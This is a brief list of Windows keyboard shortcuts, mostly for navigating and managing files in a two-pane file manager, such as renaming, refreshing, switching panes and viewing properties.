CTRL+Z - Undo last action

CTRL+(+) - Automatically resize the columns in the right hand pane

TAB - Move forward through options

ALT+RIGHT ARROW - Move forward to a previous view

ALT+LEFT ARROW - Move backward to a previous view

SHIFT+DELETE - Delete an item immediately

BACKSPACE - View the folder one level up

ALT+ENTER - View an item’s properties

F10 - Activate the menu bar in programs

F6 - Switch between left and right panes

F5 - Refresh window contents

F3 - Display Find application

F2 - Rename selected item